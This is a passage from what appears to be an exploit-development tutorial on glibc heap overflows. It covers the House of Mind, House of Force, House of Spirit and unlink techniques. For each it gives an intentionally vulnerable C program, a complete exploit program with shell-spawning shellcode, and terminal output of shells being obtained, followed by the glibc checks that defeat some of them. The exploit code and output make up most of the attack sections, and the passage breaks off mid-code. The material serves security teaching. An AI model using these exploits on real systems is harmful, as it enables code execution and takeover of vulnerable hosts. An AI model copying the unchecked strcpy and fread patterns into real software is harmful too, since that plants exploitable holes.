Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������������������������������������������������������������������������������������������������1�Ph//shh/bin��P��S���

# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

NOTE: Inorder to get this root shell, we turned off many exploit mitigation techniques. Infact for all the posts in level 1, I have disabled these exploit mitigation techniques, since the objective of level 1, is to introduce you to vulnerabilities. And  real fun happens when we get to “Level 2” of Linux (x86) Exploit Development Tutorial Series, where I will talk about bypassing these exploit mitigation techniques!!!

Heap overflow using Malloc Maleficarum

Prerequisite:

  1. Understanding glibc malloc

During late 2004, ‘glibc malloc’ got hardened. After which techniques such as unlink got obsolete, leaving the attackers clueless. But only for some time since in late 2005, ‘Phantasmal Phatasmagoria’ came with below series of techniques to successfully exploit heap overflow.

  • House of Prime
  • House of Mind
  • House of Force
  • House of Lore
  • House of Spirit

House of Mind: In this technique, attacker tricks ‘glibc malloc’ to use a fake arena constructed by him. Fake Arena is constructed in such a way that unsorted bin’s fd contains the address of GOT entry of free – 12. Thus now when vulnerable program free’s a chunk GOT entry of free is overwritten with shellcode address. After successful GOT overwrite, now when free is called by vulnerable program, shellcode would get executed!!

Prerequisites: Below are the prerequisites to successfully apply house of mind since not  all heap overflow vulnerable programs can be exploited using this technique.

  1. A series of malloc calls is required until a chunk’s address – when aligned to a multiple of HEAP_MAX_SIZE results in a memory area which is controlled by the attacker. This is the memory area where fake heap_info structure is found. Fake heap_info’s arena pointer ar_ptr would point to fake arena. Thus both fake arena and fake heap_info’s memory region would be controlled by the attacker.
  2. A chunk whose size field (and its arena pointer – prereq 1) controlled by the attacker should be freed.
  3. Chunk next to the above freed chunk should not be a top chunk.

Vulnerable Program: This program meets the above prerequisites.

/* vuln.c
 House of Mind vulnerable program
 */
#include <stdio.h>
#include <stdlib.h>

int main (void) {
 char *ptr = malloc(1024); /* First allocated chunk */
 char *ptr2; /* Second chunk/Last but one chunk */
 char *ptr3; /* Last chunk */
 int heap = (int)ptr & 0xFFF00000;
 _Bool found = 0;
 int i = 2;

 for (i = 2; i < 1024; i++) {
   /* Prereq 1: Series of malloc calls until a chunk's address - when aligned to HEAP_MAX_SIZE results in 0x08100000 */
   /* 0x08100000 is the place where fake heap_info structure is found. */
   [1]if (!found && (((int)(ptr2 = malloc(1024)) & 0xFFF00000) == \
      (heap + 0x100000))) {
     printf("good heap allignment found on malloc() %i (%p)\n", i, ptr2);
     found = 1;
     break;
   }
 }
 [2]ptr3 = malloc(1024); /* Last chunk. Prereq 3: Next chunk to ptr2 != av->top */
 /* User Input. */
 [3]fread (ptr, 1024 * 1024, 1, stdin);

 [4]free(ptr2); /* Prereq 2: Freeing a chunk whose size and its arena pointer is controlled by the attacker. */
 [5]free(ptr3); /* Shell code execution. */
 return(0); /* Bye */
}

Heap memory for the above vulnerable program:

Line[3] of the vulnerable program is where heap overflow occurs.  User input gets stored from chunk1’s mem pointer to a total size of 1 MB. Thus inorder to successfully exploit heap overflow, attackers provides the following user input (in the same listed order):

  • Fake arena
  • Junk
  • Fake heap_info
  • Shellcode

Exploit Program: This program generates attacker data file:

/* exp.c
Program to generate attacker data.
Command:
     #./exp > file
*/
#include <stdio.h>

#define BIN1 0xb7fd8430

char scode[] =
/* Shellcode to execute linux command "id". Size - 72 bytes. */
"\x31\xc9\x83\xe9\xf4\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e"
"\xc9\x6a\x42\x83\xeb\xfc\xe2\xf4\x34\xc2\x32\xdb\x0c\xaf\x02\x6f"
"\x3d\x40\x8d\x2a\x71\xba\x02\x42\x36\xe6\x08\x2b\x30\x40\x89\x10"
"\xb6\xc5\x6a\x42\x5e\xe6\x1f\x31\x2c\xe6\x08\x2b\x30\xe6\x03\x26"
"\x5e\x9e\x39\xcb\xbf\x04\xea\x42";

char ret_str[4] = "\x00\x00\x00\x00";

void convert_endianess(int arg)
{
        int i=0;
        ret_str[3] = (arg & 0xFF000000) >> 24;
        ret_str[2] = (arg & 0x00FF0000) >> 16;
        ret_str[1] = (arg & 0x0000FF00) >> 8;
        ret_str[0] = (arg & 0x000000FF) >> 0;
}
int main() {
        int i=0,j=0;

        fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* fd */
        fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* bk */
        fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* fd_nextsize */
        fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* bk_nextsize */
        /* Fake Arena. */
        fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* mutex */
        fwrite("\x01\x00\x00\x00", 4, 1, stdout); /* flag */
        for(i=0;i<10;i++)
                fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* fastbinsY */
        fwrite("\xb0\x0e\x10\x08", 4, 1, stdout); /* top */
        fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* last_remainder */
        for(i=0;i<127;i++) {
                convert_endianess(BIN1+(i*8));
                if(i == 119) {
                        fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* preserve prev_size */
                        fwrite("\x09\x04\x00\x00", 4, 1, stdout); /* preserve size */
                } else if(i==0) {
                        fwrite("\xe8\x98\x04\x08", 4, 1, stdout); /* bins[i][0] = (GOT(free) - 12) */
                        fwrite(ret_str, 4, 1, stdout); /* bins[i][1] */
                }
                else {
                        fwrite(ret_str, 4, 1, stdout); /* bins[i][0] */
                        fwrite(ret_str, 4, 1, stdout); /* bins[i][1] */
                }
        }
        for(i=0;i<4;i++) {
                fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* binmap[i] */
        }
        fwrite("\x00\x84\xfd\xb7", 4, 1, stdout); /* next */
        fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* next_free */
        fwrite("\x00\x60\x0c\x00", 4, 1, stdout); /* system_mem */
        fwrite("\x00\x60\x0c\x00", 4, 1, stdout); /* max_system_mem */
        for(i=0;i<234;i++) {
                fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* PAD */
        }
        for(i=0;i<722;i++) {
                if(i==721) {
                        /* Chunk 724 contains the shellcode. */
                        fwrite("\xeb\x18\x00\x00", 4, 1, stdout); /* prev_size  - Jmp 24 bytes */
                        fwrite("\x0d\x04\x00\x00", 4, 1, stdout); /* size */
                        fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* fd */
                        fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* bk */
                        fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* fd_nextsize */
                        fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* bk_nextsize */
                        fwrite("\x90\x90\x90\x90\x90\x90\x90\x90" \
                        "\x90\x90\x90\x90\x90\x90\x90\x90", 16, 1, stdout);  /* NOPS */
                        fwrite(scode, sizeof(scode)-1, 1, stdout); /* SHELLCODE */
                        for(j=0;j<230;j++)
                                fwrite("\x42\x42\x42\x42", 4, 1, stdout); /* PAD */
                        continue;
                } else {
                        fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* prev_size */
                        fwrite("\x09\x04\x00\x00", 4, 1, stdout); /* size */
                }
                if(i==720) {
                        for(j=0;j<90;j++)
                                fwrite("\x42\x42\x42\x42", 4, 1, stdout); /* PAD */
                        fwrite("\x18\xa0\x04\x08", 4, 1, stdout); /* Arena Pointer */
                        for(j=0;j<165;j++)
                                fwrite("\x42\x42\x42\x42", 4, 1, stdout); /* PAD */
                } else {
                        for(j=0;j<256;j++)
                                fwrite("\x42\x42\x42\x42", 4, 1, stdout); /* PAD */
                }
        }
        return 0;
}

Heap memory for the vulnerable program, with attacker generated data file as user input:

With attacker generated data file as user input, ‘glibc malloc’ does the following, when line[4] of our vulnerable program gets executed:

  • Arena for the chunk that is getting freed is retrieved by invoking arena_for_chunk macro.
    • arena_for_chunk: If NON_MAIN_ARENA (N) bit is not set, main arena is returned. If set, corresponding heap_info structure is accessed by aligning the chunk address to a multiple of HEAP_MAX_SIZE. Then arena pointer of the obtained heap_info structure is returned. In our case, NON_MAIN_ARENA bit is set by the attacker and hence heap_info structure (located at 0x08100000) of the chunk that is getting freed is obtained. Attacker would also have overwritten the arena pointer (of the obtained heap_info structure) in such a way that it points to the fake arena, ie) heap_info’s ar_ptr = Fake arena’s base address (ie)0x0804a018).
  • Invoke _int_free with arena pointer and chunk address as arguments. In our case arena pointer points to fake arena. Thus fake arena and chunk address are passed as arguments to _int_free.
    • Fake Arena: Following are the mandatory fields of fake arena that needs to be overwritten by the attacker:
      • Mutex – It should be in unlocked state.
      • Bins – Unsorted bin’s fd should contain the address of GOT entry of free – 12.
      • Top
        • Top address should not be equal to the chunk address that is getting freed.
        • Top address should be greater than next chunk address.
      • System Memory – System memory should be greater than next chunk size.
  • _int_free():
    • If chunk is non mmap’d, acquire the lock. In our case chunk is non mmap’d and fake arena’s mutex lock is acquired successfully.
    • Consolidate:
      • Find if previous chunk is free, if free consolidate. In our case previous chunk is allocated and hence it cant be consolidated backward.
      • Find if next chunk is free, if free consolidate. In our case next chunk is allocated and hence it cant be consolidated forward.
    • Place the currently freed chunk in unsorted bin. In our case fake arena’s unsorted bin’s fd contains the address of GOT entry of free – 12 which gets copied to ‘fwd‘ value. Later currently freed chunk’s address gets copied to ‘fwd->bk’. bk is located at offset 12 in malloc_chunk and hence 12 gets added to this ‘fwd’ value (ie) free-12+12). Thus now GOT entry of free gets modified to contain currently freed chunk address. Since the attacker has placed his shellcode in the currently freed chunk, from now on whenever free gets invoked attacker’s shellcode gets executed!!

Executing the vulnerable program with attacker generated data file as user input executes the shell code as shown below:

sploitfun@sploitfun-VirtualBox:~/lsploits/hof/hom$ gcc -g -z norelro -z execstack -o vuln vuln.c -Wl,--rpath=/home/sploitfun/glibc/glibc-inst2.20/lib -Wl,--dynamic-linker=/home/sploitfun/glibc/glibc-inst2.20/lib/ld-linux.so.2
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/hom$ gcc -g -o exp exp.c
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/hom$ ./exp > file
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/hom$ ./vuln < file
ptr found at 0x804a008
good heap allignment found on malloc() 724 (0x81002a0)
uid=1000(sploitfun) gid=1000(sploitfun) groups=1000(sploitfun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare)

Protection: At present day, house of mind technique doesnt work since ‘glibc malloc’ has got hardened. Below check is added to prevent heap overflow using house of mind.

  • Corrupted chunks: Unsorted bin’s first chunk’s bk pointer should point to unsorted bin. If not ‘glibc malloc’ throws up corrupted chunk error.
      if (__glibc_unlikely (fwd->bk != bck))
        {
          errstr = "free(): corrupted unsorted chunks";
          goto errout;
        }

House of Force: In this technique, attacker abuses top chunk size and tricks ‘glibc malloc’ to service a very large memory request (greater than heap system memory size) using top chunk. Now when a new malloc request is made, GOT entry of free would be overwritten with shellcode address. Hence from now on whenever free is called, shellcode gets executed!!

Prerequisites: Three malloc calls are required to successfully apply house of force as listed below:

  • Malloc 1: Attacker should be able to control the size of top chunk. Hence heap overflow should be possible on this allocated chunk which is physically located previous to top chunk.
  • Malloc 2: Attacker should be able to control the size of this malloc request.
  • Malloc 3: User input should be copied to this allocated chunk.

Vulnerable Program: This program meets the above prerequisites.

/*
House of force vulnerable program. 
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h> 

int main(int argc, char *argv[])
{
        char *buf1, *buf2, *buf3;
        if (argc != 4) {
                printf("Usage Error\n");
                return;
        }
        [1]buf1 = malloc(256);
        [2]strcpy(buf1, argv[1]); /* Prereq 1 */
        [3]buf2 = malloc(strtoul(argv[2], NULL, 16)); /* Prereq 2 */
        [4]buf3 = malloc(256); /* Prereq 3 */
        [5]strcpy(buf3, argv[3]); /* Prereq 3 */

        [6]free(buf3);
        free(buf2);
        free(buf1);
        return 0;
}

Heap memory for the above vulnerable program:

Line[2] of the vulnerable program is where heap overflow occurs.  Thus inorder to successfully exploit heap overflow, attacker provides the following commad line arguments:

  • argv[1] – Shellcode + Pad + Top chunk size to be copied to first malloc chunk.
  • argv[2] – Size argument to second malloc chunk.
  • argv[3] – User input to be copied to third malloc chunk.

Exploit Program:

/* Program to exploit executable 'vuln' using hof technique.
 */
#include <stdio.h>
#include <unistd.h>
#include <string.h>

#define VULNERABLE "./vuln"
#define FREE_ADDRESS 0x08049858-0x8
#define MALLOC_SIZE "0xFFFFF744"
#define BUF3_USER_INP "\x08\xa0\x04\x08"
                
/* Spawn a shell. Size - 25 bytes. */
char scode[] =
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
        
int main( void )
{       
        int i;
        char * p;
        char argv1[ 265 ];
        char * argv[] = { VULNERABLE, argv1, MALLOC_SIZE, BUF3_USER_INP, NULL };
        
        strcpy(argv1,scode);
        for(i=25;i<260;i++)
                argv1[i] = 'A';
        
        strcpy(argv1+260,"\xFF\xFF\xFF\xFF"); /* Top chunk size */
        argv[264] = ''; /* Terminating NULL character */ 

        /* Execution of the vulnerable program */
        execve( argv[0], argv, NULL );
        return( -1 );
}

Heap memory for the vulnerable program, once attacker’s command line arguments gets copied into heap:

With attacker arguments following happens:

Line[2] overwrites top chunk size:

  • Attacker argument (argv[1] – Shellcode + Pad + 0xFFFFFFFF) gets copied into heap buffer ‘buf1’. But since argv[1] is greater than 256, top chunk’s size gets overwritten with “0xFFFFFFFF”

Line[3] allocates a very large block using top chunk code:

  • Objective of very large block allocation request is after allocation, new top chunk should be located 8 bytes before the GOT entry of free. So one more malloc request (line[4]) would help us to overwrite GOT entry of free.
  • Attacker argument (argv[2] – 0xFFFFF744) gets passed as size argument to second malloc call (line[3]). The size argument is calculated using below formulae:
    •  size = ((free-8)-top)
    • where
      • free is “GOT entry of free in executable ‘vuln'” ie) free = 0x08049858.
      • top is “current top chunk (after first malloc line[1])” ie) top = 0x0804a108.
    • Thus size = ((0x8049858-0x8)-0x804a108) = -8B8 = 0xFFFFF748
    • When size = 0xFFFFF748 our objective of placing the new top chunk 8 bytes before the GOT entry of free is achieved as shown below:
      • (0xFFFFF748+0x804a108) = 0x08049850 = (0x08049858-0x8)
    • But when attacker passes a size argument of 0xFFFFF748 ‘glibc malloc’ converts the size into usable size 0xFFFFF750 and hence now new top chunk size would be located at 0x8049858 instead of 0x8049850. Therefore instead of 0xFFFFF748 attacker should pass 0xFFFFF744 as size argument, which gets converted into usable size ‘0xFFFFF748’ as we require!!

At line [4]:

  • Now since in line[3] top chunk points to 0x8049850, a memory allocation request of 256 bytes would make ‘glibc malloc’ to return 0x8049858 which gets copied to buf3.

At line [5]:

  • Copying buf1 address to buf3, results in GOT overwrite. Thus call to free (line[6]) would result in shellcode execution!!

Executing the vulnerable program with attacker’s command line argument executes the shell code as shown below:

sploitfun@sploitfun-VirtualBox:~/lsploits/hof/hof$ gcc -g -z norelro -z execstack -o vuln vuln.c -Wl,--rpath=/home/sploitfun/glibc/glibc-inst2.20/lib -Wl,--dynamic-linker=/home/sploitfun/glibc/glibc-inst2.20/lib/ld-linux.so.2
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/hof$ gcc -g -o exp exp.c
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/hof$ ./exp 
$ ls
cmd  exp  exp.c  vuln  vuln.c
$ exit
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/hof$ 

Protection: Till date, there is no protection added to this technique. Yup this technique helps us to exploit heap overflows even when compiled with latest glibc!! 🙂

House of Spirit: In this technique, attacker tricks ‘glibc malloc’ to return a chunk which resides in stack segment (instead of heap segment). This allows the attacker to overwrite ‘Return Address’ stored in the stack.

Prerequisite: Below are the prerequisites to successfully apply house of spirit since not all heap overflow vulnerable programs can be exploited using this technique.

  • A buffer overflow to overwrite a variable which contains the chunk address, returned by ‘glibc malloc’.
  • Above chunk should be freed. Attacker should control the size of this freed chunk. He controls in such a way that its size is equal to next malloc’d chunk size.
  • Malloc a chunk.
  • User input should be copied to the above malloc’d chunk.

 Vulnerable Program: This program meets the above prerequisites.

/* vuln.c
House of Spirit vulnerable program
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void fvuln(char *str1, int age)
{
   char *ptr1, name[44];
   int local_age;
   char *ptr2;
   [1]local_age = age; /* Prereq 2 */

   [2]ptr1 = (char *) malloc(256);
   printf("\nPTR1 = [ %p ]", ptr1);
   [3]strcpy(name, str1); /* Prereq 1 */
   printf("\nPTR1 = [ %p ]\n", ptr1);
   [4]free(ptr1); /* Prereq 2 */

   [5]ptr2 = (char *) malloc(40); /* Prereq 3 */
   [6]snprintf(ptr2, 40-1, "%s is %d years old", name, local_age); /* Prereq 4 */
   printf("\n%s\n", ptr2);
}

int main(int argc, char *argv[])
{
   int i=0;
   int stud_class[10];  /* Required since nextchunk size should lie in between 8 and arena's system_mem. */
   for(i=0;i<10;i++)
        [7]stud_class[i] = 10;
   if (argc == 3)
      fvuln(argv[1], 25);
   return 0;
}

Stack Layout of the above vulnerable program:

Line[3] of the vulnerable program is where buffer overflow occurs. Thus inorder to successfully exploit the vulnerable program, attacker gives the below command line argument:

  • argv[1] = Shell Code + Stack Address + Chunk size

Exploit Program:

/* Program to exploit executable 'vuln' using hos technique.
 */
#include <stdio.h>
#include <unistd.h>
#include <string.h>

#define VULNERABLE "./vuln"

/* Shellcode to spwan a shell. Size: 48 bytes - Includes Return Address overwrite */
char scode[] =
        "\xeb\x0e\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xb8\xfd\xff\xbf\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90";

int main( void )
{
        int i;
        char * p;
        char argv1[54];
        char * argv[] = { VULNERABLE, argv1, NULL };

        strcpy(argv1,scode);

        /* Overwrite ptr1 in vuln with stack address - 0xbffffdf0. Overwrite local_age in vuln with chunk size - 0x30 */
        strcpy(argv1+48,"\xf0\xfd\xff\xbf\x30"); 

        argv[53] = '';

        /* Execution of the vulnerable program */
        execve( argv[0], argv, NULL );
        return( -1 );
}

Stack Layout of the above vulnerable program with attacker argument:

With attacker argument let us see how return address is overwritten:

Line[3]: Buffer overflow

  • Here attacker input ‘argv[1]’ is copied to char buffer ‘name’. Since attacker input is greater than 44, variable’s ptr1 and local_age gets overwritten with stack address and chunk size, respectively.
    • Stack address -0xbffffdf0 – Attacker tricks ‘glibc malloc’ to return this address when line[5] gets executed.
    • Chunk size – 0x30 – This chunk size is used to trick ‘glibc malloc’ when line[4] (see below) gets executed.

Line[4]: Add stack region to ‘glibc malloc’s’ fast bin.

  • free() invokes _int_free(). Now after buffer overflow ptr1 = 0xbffffdf0 (and not 0x804aa08). Overwritten ptr1 is passed as an argument to free(). This  tricks ‘glibc malloc’ to free a memory region located in stack segment. Size of this stack region that is getting freed, located at ptr1-8+4 is overwritten by the attacker as 0x30 and hence ‘glibc malloc’ treats this chunk as fast chunk ( since 48 < 64) and inserts the freed chunk at the front end of the fast binlist located at index 4.

Line[5]: Retrieve the stack region (added in line[4])

  • malloc request of 40 is converted into usable size 48 by checked_request2size. Since the usable size ’48’ belongs to fast chunk, its corresponding fast bin (located at index 4) is retrieved. First chunk of the fast binlist is removed and returned to the user. The first chunk is nothing but the stack region added during line[4]’s execution.

Line[6]: Overwrite Return Address

  • Copy the attacker argument ‘argv[1]’ into the stack region (returned by ‘glibc malloc’) starting from location 0xbffffdf0. First 16 bytes of argv[1] is
    • \xeb\x0e – Jmp by 14 bytes
    • \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 – Pad
    • \xb8\xfd\xff\xbf – Return Address stored in stack gets overwritten by this value. Hence after fvuln gets executed, EIP would be 0xbffffdb8 – this location contains the jmp instruction followed by a shellcode to spawn a shell!!

Executing the vulnerable program with attacker’s argument executes the shell code as shown below:

sploitfun@sploitfun-VirtualBox:~/Dropbox/sploitfun/heap_overflow/Malloc-Maleficarum/hos$ gcc -g -fno-stack-protector -z norelro -z execstack -o vuln vuln.c -Wl,--rpath=/home/sploitfun/glibc/glibc-inst2.20/lib -Wl,--dynamic-linker=/home/sploitfun/glibc/glibc-inst2.20/lib/ld-linux.so.2
sploitfun@sploitfun-VirtualBox:~/Dropbox/sploitfun/heap_overflow/Malloc-Maleficarum/hos$ gcc -g -o exp exp.c
sploitfun@sploitfun-VirtualBox:~/Dropbox/sploitfun/heap_overflow/Malloc-Maleficarum/hos$ ./exp 

PTR1 = [ 0x804a008 ]
PTR1 = [ 0xbffffdf0 ]

AAAAAAAAAA����1�Ph//shh/bin��P��S�
$ ls
cmd  exp  exp.c  print	vuln  vuln.c
$ exit
sploitfun@sploitfun-VirtualBox:~/Dropbox/sploitfun/heap_overflow/Malloc-Maleficarum/hos$

Protection: Till date, there is no protection added to this technique. Yup this technique helps us to exploit heap overflows even when compiled with latest glibc!! 🙂

House of Prime: TBU

House of Lore: TBU

NOTE: For demo purposes, all vulnerable programs are compiled without following linux protection mechanisms:

Reference:

Heap overflow using unlink

Prerequisite:

  1. Understanding glibc malloc

In this post lets learn how heap overflow can be successfully exploited using unlink technique. But before looking into unlink, first lets look into a vulnerable program:

/* 
 Heap overflow vulnerable program. 
 */
#include <stdlib.h>
#include <string.h>

int main( int argc, char * argv[] )
{
        char * first, * second;

/*[1]*/ first = malloc( 666 );
/*[2]*/ second = malloc( 12 );
        if(argc!=1)
/*[3]*/         strcpy( first, argv[1] );
/*[4]*/ free( first );
/*[5]*/ free( second );
/*[6]*/ return( 0 );
}

Line [3] of the above program results in heap overflow. User input ‘argv[1]’ is copied to heap buffer ‘first’ without any size restriction. Hence when the user input is greater than 666 bytes, its bounded to overwrite chunk header of the next chunk. This overflow leads to arbitrary code execution.

Pictorial view of heap memory for the vulnerable program:

Unlink:  The main idea of this technique is to trick ‘glibc malloc’ to unlink the ‘second’ chunk. While unlinking GOT entry of free would get overwritten with shellcode address!! After successful overwrite, now when free is called by vulnerable program at line [5], shellcode would get executed. Not very clear? No problem, first lets see what ‘glibc malloc’ does when free gets executed.

Without attacker influence, free at line [4] does the following:

  • For non mmaped chunks, consolidate backward and/or forward.
  • Consolidate backward:
    • Find if previous chunk is free – Previous chunk is free, if current freed chunk’s PREV_INUSE (P) bit is unset. But in our case, previous chunk is allocated since ‘first”s PREV_INUSE bit is set, by default chunk previous to the very first chunk of heap memory is allocated (eventhough it doesnt exists).
    • If free, consolidate ie) unlink (remove) the previous chunk from its binlist, add previous chunk size to current size and change the chunk pointer to point to previous chunk. But in our case previous chunk is allocated, hence unlink isnt invoked. Thus currently freed chunk ‘first’ cant be consolidated backward.
  • Consolidate forward:
    • Find if next chunk is free – Next chunk is free, if next-to-next chunk’s (from currently freed chunk) PREV_INUSE (P) bit is unset. To navigate to next-to-next chunk, add currently freed chunk’s size to its chunk pointer, then add next chunk’s size to next chunk pointer. In our case next-to-next chunk to currently freed ‘first’ chunk is top chunk and its PREV_INUSE bit is set. Thus next chunk ‘second’ chunk is NOT free.
    • If free, consolidate ie) unlink (remove) the next chunk from its binlist and add next chunk size to current size. But in our case next chunk is allocated, hence unlink isnt invoked. Thus currently freed chunk ‘first’ cant be consolidated forward.
  • Now add the consolidated chunk to unsorted bin.  In our case since no consolidation happens, just add the ‘first’ chunk to unsorted bin.

Now lets say attacker at line [3] overwrites the chunk header of ‘second’ chunk as follows:

  • prev_size = even number and hence PREV_INUSE bit is unset.
  • size = -4
  • fd = free address – 12
  • bk = shellcode address

With attacker influence, free at line [4] does the following:

  • For non mmaped chunks, consolidate backward and/or forward.
  • Consolidate backward:
    • Find if previous chunk is free – Previous chunk is free, if current freed chunk’s PREV_INUSE (P) bit is unset. But in our case, previous chunk is allocated since ‘first”s PREV_INUSE bit is set since by default chunk previous to very first chunk of heap memory is allocated (eventhough it doesnt exists).
    • If free, consolidate ie) unlink (remove) the previous chunk from its binlist, add previous chunk size to current size and change the chunk pointer to point to previous chunk. But in our case previous chunk is allocated, hence unlink isnt invoked. Thus currently freed chunk ‘first’ cant be consolidated backward.
  • Consolidate forward:
    • Find if next chunk is free – Next chunk is free, if next-to-next chunk’s (from currently freed chunk) PREV_INUSE (P) bit is unset.To navigate to next-to-next chunk, add ‘currently freed chunk’s size to its chunk pointer, then add next chunk’s size to next chunk pointer. In our case next-to-next chunk to currently freed ‘first’ chunk is NOT top chunk. Next-to-next chunk is at offset -4 from ‘second’ chunk since attacker has overwritten ‘second’ chunk’s size with -4. Thus now ‘glibc malloc’ treats prev_inuse field of ‘second’ chunk as size field of next-to-next chunk. Since attacker has overwritten an even number ( ie) PREV_INUSE (P)  bit is unset) in place of prev_size ‘glibc malloc’ is tricked to believe that ‘second’ chunk is free.
    • If free, consolidate ie) unlink (remove) the next chunk from its binlist and add next chunk size to current size. And in our case next chunk is free, hence ‘second’ chunk is unlinked as follows:
      • Copy ‘second’ chunk’s fd and bk values to variables FD and BK, respectively. In our case FD = free address -12 and BK = shellcode address (As part of heap overflow, attacker places his shellcode inside ‘first’ heap buffer)
      • Value of BK is copied to a location at offset 12 from FD. In our case adding 12 bytes to FD, points to GOT entry of free and hence now GOT entry of free is overwritten with shellcode address. Bingo!! Now on whenever free is invoked, shellcode gets executed!! Thus executing line [5] in vulnerable program results in shellcode execution.
  • Now add the consolidated chunk to unsorted bin.

Pictorial view of heap memory for the vulnerable program, with attacker influenced user input:

Having understood the unlink technique, lets write an exploit program.

/* Program to exploit 'vuln' using unlink technique.
 */
#include <string.h>
#include <unistd.h>

#define FUNCTION_POINTER ( 0x0804978c )         //Address of GOT entry for free function obtained using "objdump -R vuln".
#define CODE_ADDRESS ( 0x0804a008 + 0x10 )      //Address of variable 'first' in vuln executable. 

#define VULNERABLE "./vuln"
#define DUMMY 0xdefaced
#define PREV_INUSE 0x1

char shellcode[] =
        /* Jump instruction to jump past 10 bytes. ppssssffff - Of which ffff would be overwritten by unlink function
        (by statement BK->fd = FD). Hence if no jump exists shell code would get corrupted by unlink function. 
        Therefore store the actual shellcode 12 bytes past the beginning of buffer 'first'*/
        "\xeb\x0assppppffff"
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

int main( void )
{
        char * p;
        char argv1[ 680 + 1 ];
        char * argv[] = { VULNERABLE, argv1, NULL };

        p = argv1;
        /* the fd field of the first chunk */
        *( (void **)p ) = (void *)( DUMMY );
        p += 4;
        /* the bk field of the first chunk */
        *( (void **)p ) = (void *)( DUMMY );
        p += 4;
        /* the fd_nextsize field of the first chunk */
        *( (void **)p ) = (void *)( DUMMY );
        p += 4;
        /* the bk_nextsize field of the first chunk */
        *( (void **)p ) = (void *)( DUMMY );
        p += 4;
        /* Copy the shellcode */
        memcpy( p, shellcode, strlen(shellcode) );
        p += strlen( shellcode );
        /* Padding- 16 bytes for prev_size,size,fd and bk of second chunk. 16 bytes for fd,bk,fd_nextsize,bk_nextsize 
        of first chunk */
        memset( p, 'B', (680 - 4*4) - (4*4 + strlen(shellcode)) );
        p += ( 680 - 4*4 ) - ( 4*4 + strlen(shellcode) );
        /* the prev_size field of the second chunk. Just make sure its an even number ie) its prev_inuse bit is unset */
        *( (size_t *)p ) = (size_t)( DUMMY & ~PREV_INUSE );
        p += 4;
        /* the size field of the second chunk. By setting size to -4, we trick glibc malloc to unlink second chunk.*/
        *( (size_t *)p ) = (size_t)( -4 );
        p += 4;
        /* the fd field of the second chunk. It should point to free - 12. -12 is required since unlink function
        would do + 12 (FD->bk). This helps to overwrite the GOT entry of free with the address we have overwritten in 
        second chunk's bk field (see below) */
        *( (void **)p ) = (void *)( FUNCTION_POINTER - 12 );
        p += 4;
        /* the bk field of the second chunk. It should point to shell code address.*/
        *( (void **)p ) = (void *)( CODE_ADDRESS );
        p += 4;
        /* the terminating NUL character */
        *p = '';

        /* the execution of the vulnerable program */
        execve( argv[0], argv, NULL );
        return( -1 );
}

Executing the above program shows that a new shell is spawned!!

sploitfun@sploitfun-VirtualBox:~/lsploits/hof/unlink$ gcc -g -z norelro -z execstack -o vuln vuln.c -Wl,--rpath=/home/sploitfun/glibc/glibc-inst2.20/lib -Wl,--dynamic-linker=/home/sploitfun/glibc/glibc-inst2.20/lib/ld-linux.so.2
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/unlink$ gcc -g -o exp exp.c
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/unlink$ ./exp 
$ ls
cmd  exp  exp.c  vuln  vuln.c
$ exit
sploitfun@sploitfun-VirtualBox:~/lsploits/hof/unlink$

Protection: At present day, unlink technique doesnt work since ‘glibc malloc’ has got hardened over the years. Below checks are added to prevent heap overflow using unlink technique.

  • Double free: Freeing a chunk which is already in free state is prohibited. When attacker overwrites ‘second’ chunk’s size with -4, its PREV_INUSE bit is unset which means ‘first’ is already in free state. Hence ‘glibc malloc’ throws up double free error.
    if (__glibc_unlikely (!prev_inuse(nextchunk)))
      {
        errstr = "double free or corruption (!prev)";
